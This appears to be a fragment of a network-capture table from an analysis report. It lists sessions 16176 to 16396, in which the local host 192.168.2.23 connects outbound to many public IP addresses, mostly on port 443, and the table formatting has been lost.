                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16176192.168.2.2335978152.36.8.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16177192.168.2.2334876117.53.149.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16178192.168.2.2347292220.124.20.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16179192.168.2.2344946199.186.28.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16180192.168.2.234738074.128.201.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16181192.168.2.2357036104.228.85.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16182192.168.2.236075646.14.11.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16183192.168.2.2345522164.94.6.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16184192.168.2.2342680203.94.4.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16185192.168.2.2350626104.75.106.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16186192.168.2.235382267.113.189.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16187192.168.2.2352164203.199.108.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16188192.168.2.235207019.224.206.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16189192.168.2.2354986105.80.193.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16190192.168.2.233515081.4.52.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16191192.168.2.235237483.26.158.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16192192.168.2.2339416103.151.145.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16193192.168.2.2343512119.200.159.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16194192.168.2.235667870.161.231.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16195192.168.2.2335780155.3.77.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16196192.168.2.2334740137.63.6.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16197192.168.2.2347068133.45.129.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16198192.168.2.235321676.36.227.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16199192.168.2.233728831.173.68.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16200192.168.2.2341290170.164.236.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16201192.168.2.233472614.125.98.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16202192.168.2.2358774109.229.61.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16203192.168.2.2357356172.44.18.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16204192.168.2.2354196168.105.155.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16205192.168.2.2342972151.225.39.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16206192.168.2.2356956105.83.236.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16207192.168.2.2333066111.68.107.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16208192.168.2.2349350119.168.221.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16209192.168.2.2355234128.79.172.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16210192.168.2.2357824194.191.168.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16211192.168.2.234306077.176.110.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16212192.168.2.2350436174.87.137.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16213192.168.2.234651274.10.182.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16214192.168.2.2359918185.169.72.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16215192.168.2.2334830118.192.227.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16216192.168.2.2334826199.163.65.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16217192.168.2.233382476.61.181.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16218192.168.2.2334548168.78.34.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16219192.168.2.2342916132.60.51.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16220192.168.2.2338334188.36.163.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16221192.168.2.234430854.106.147.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16222192.168.2.234808473.109.92.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16223192.168.2.2346434177.161.187.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16224192.168.2.2352952154.23.177.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16225192.168.2.2337798115.222.182.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16226192.168.2.2335866218.209.113.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16227192.168.2.2333380205.125.190.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16228192.168.2.233967465.110.160.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16229192.168.2.2358972167.240.38.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16230192.168.2.2338646118.74.177.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16231192.168.2.233802464.12.200.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16232192.168.2.235896237.104.217.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16233192.168.2.234608085.83.24.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16234192.168.2.2349124211.135.62.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16235192.168.2.233879435.201.196.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16236192.168.2.2345264141.196.241.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16237192.168.2.233816294.107.72.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16238192.168.2.233388439.224.162.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16239192.168.2.235005469.145.219.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16240192.168.2.2349264204.86.41.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16241192.168.2.235383278.28.83.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16242192.168.2.2340048168.70.111.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16243192.168.2.2352246145.58.82.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16244192.168.2.233551294.76.140.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16245192.168.2.2345296139.150.170.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16246192.168.2.2350016216.9.68.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16247192.168.2.2336958193.7.202.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16248192.168.2.235779868.169.3.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16249192.168.2.234091279.101.6.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16250192.168.2.2334016199.242.195.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16251192.168.2.234392894.99.45.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16252192.168.2.2335766183.193.150.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16253192.168.2.2345374121.236.85.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16254192.168.2.234889069.51.79.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16255192.168.2.2345056135.88.8.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16256192.168.2.2335126189.224.131.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16257192.168.2.233456678.132.78.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16258192.168.2.2347320213.8.112.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16259192.168.2.2357368163.249.92.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16260192.168.2.2359606192.222.225.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16261192.168.2.235808495.105.0.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16262192.168.2.236015653.83.130.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16263192.168.2.2346502100.9.116.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16264192.168.2.233755063.148.57.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16265192.168.2.234257497.219.24.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16266192.168.2.2345792218.9.108.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16267192.168.2.2350368132.232.164.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16268192.168.2.2354814223.155.161.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16269192.168.2.23464002.212.228.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16270192.168.2.2347454126.77.45.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16271192.168.2.233732213.91.126.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16272192.168.2.2356544186.103.114.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16273192.168.2.2333108176.73.136.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16274192.168.2.235351651.101.148.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16275192.168.2.2353382117.122.42.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16276192.168.2.234981658.60.14.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16277192.168.2.236003657.172.93.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16278192.168.2.235096479.42.216.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16279192.168.2.233986466.249.81.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16280192.168.2.2350948178.1.77.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16281192.168.2.233356689.139.76.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16282192.168.2.233706652.141.72.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16283192.168.2.2360204198.126.204.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16284192.168.2.2334796212.159.58.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16285192.168.2.2352862189.111.95.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16286192.168.2.2360166178.27.227.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16287192.168.2.2348796103.54.57.2378080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16288192.168.2.2353610223.106.3.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16289192.168.2.2346334103.143.250.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16290192.168.2.2341558175.56.81.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16291192.168.2.2348456175.124.213.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16292192.168.2.2344960170.48.123.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16293192.168.2.2338472161.3.247.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16294192.168.2.2346064161.87.247.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16295192.168.2.2356364219.40.214.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16296192.168.2.2344510210.200.224.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16297192.168.2.233768881.33.178.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16298192.168.2.2346788199.138.135.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16299192.168.2.233306460.42.23.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16300192.168.2.2357130147.51.214.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16301192.168.2.2354220107.213.32.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16302192.168.2.2334128142.196.103.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16303192.168.2.234771259.120.173.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16304192.168.2.235528646.32.172.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16305192.168.2.2342518125.30.108.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16306192.168.2.235400836.172.87.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16307192.168.2.2343888176.23.3.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16308192.168.2.2332984172.146.18.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16309192.168.2.2348842130.207.201.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16310192.168.2.2357094152.163.211.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16311192.168.2.2340888129.173.179.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16312192.168.2.2355770168.114.128.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16313192.168.2.2341506147.225.189.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16314192.168.2.2338242190.48.176.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16315192.168.2.233845613.238.121.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16316192.168.2.2335178204.205.60.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16317192.168.2.233835627.205.163.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16318192.168.2.2349968168.31.125.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16319192.168.2.2332840106.20.191.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16320192.168.2.2342044140.153.34.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16321192.168.2.2338268221.129.181.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16322192.168.2.234015684.230.90.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16323192.168.2.235850612.127.127.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16324192.168.2.233870272.178.229.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16325192.168.2.2345106139.188.2.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16326192.168.2.2359320136.155.84.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16327192.168.2.2333336122.18.46.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16328192.168.2.2351986113.55.44.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16329192.168.2.234490434.55.77.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16330192.168.2.2345604117.33.25.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16331192.168.2.236047634.16.48.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16332192.168.2.2343140198.171.193.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16333192.168.2.2357974160.121.16.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16334192.168.2.2355080203.131.137.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16335192.168.2.233351827.133.90.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16336192.168.2.236023294.14.135.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16337192.168.2.2340874207.62.160.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16338192.168.2.234319831.252.245.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16339192.168.2.233604276.101.238.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16340192.168.2.2337912166.54.233.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16341192.168.2.2359610147.117.226.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16342192.168.2.23547985.13.200.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16343192.168.2.2355042130.103.144.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16344192.168.2.235348694.231.199.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16345192.168.2.234545473.39.57.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16346192.168.2.2343928109.225.50.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16347192.168.2.233293499.100.114.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16348192.168.2.2349706135.133.111.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16349192.168.2.234938446.141.2.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16350192.168.2.234009281.91.31.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16351192.168.2.2335788135.222.195.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16352192.168.2.2346888156.82.147.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16353192.168.2.2341022156.226.16.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16354192.168.2.2359804143.206.153.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16355192.168.2.2336330132.131.14.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16356192.168.2.234461451.190.44.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16357192.168.2.2355236187.213.17.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16358192.168.2.2350250204.132.120.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16359192.168.2.23390808.23.251.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16360192.168.2.2358506183.100.74.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16361192.168.2.234901218.128.74.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16362192.168.2.2338634156.97.222.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16363192.168.2.2353916179.112.159.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16364192.168.2.2335868135.73.28.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16365192.168.2.233666612.30.246.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16366192.168.2.2349180131.215.11.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16367192.168.2.2336942206.163.203.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16368192.168.2.235712698.124.92.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16369192.168.2.235334673.60.122.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16370192.168.2.2333900119.123.208.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16371192.168.2.235106219.58.195.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16372192.168.2.2337156204.46.253.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16373192.168.2.2342472107.145.147.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16374192.168.2.2359980141.3.205.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16375192.168.2.2355372163.42.73.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16376192.168.2.2336504223.7.141.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16377192.168.2.2354380105.171.168.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16378192.168.2.2349164135.176.85.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16379192.168.2.2333348170.116.210.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16380192.168.2.2333080186.42.91.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16381192.168.2.2355792170.240.139.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16382192.168.2.2350286182.207.25.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16383192.168.2.2353972172.108.86.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16384192.168.2.235538488.238.134.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16385192.168.2.233598437.230.88.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16386192.168.2.2360854118.49.90.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16387192.168.2.2352026221.225.252.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16388192.168.2.2345556162.135.112.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16389192.168.2.2358438192.245.94.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16390192.168.2.2343848154.86.242.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16391192.168.2.235786670.5.23.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16392192.168.2.2359690182.10.172.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16393192.168.2.2358846146.36.81.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16394192.168.2.2346670161.181.164.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16395192.168.2.235082884.217.167.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16396192.168.2.23369062.53.221.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
